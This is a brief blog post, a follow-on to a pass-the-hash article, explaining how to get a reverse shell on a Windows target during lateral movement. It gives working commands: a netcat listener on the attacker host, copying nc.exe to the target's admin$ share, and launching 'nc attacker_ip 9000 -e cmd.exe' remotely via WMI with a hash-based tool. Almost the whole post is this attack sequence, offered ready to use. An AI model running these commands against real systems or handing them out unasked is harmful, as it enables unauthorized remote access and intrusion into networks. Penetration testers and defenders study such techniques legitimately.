Oct 282019
 

In a previous article, we have seen how to perform lateral movement thru « Pass The Hash ».

Lets imagine that there is no RDP server available on the target but you still need to get a shell on the target.

Lets use a reverse shell i.e the target will connect back to us (the attacker).

Usefull as well if the firewall on the target is allowing only outbound connections.

1.Set a shell with netcat on the attacker host
nc -L -vv -p 9000

2.Copy file to target host (remember, you are using a pth shell with proper logon details).
copy nc.exe \\target\admin$

3.Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:nc attacker_ip 9000 -e cmd.exe

At this point you will get a shell popup in your listening netcat.

Try a simple whoami for fun.

Poster un Commentaire

avatar

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.

  S’abonner  
Notifier de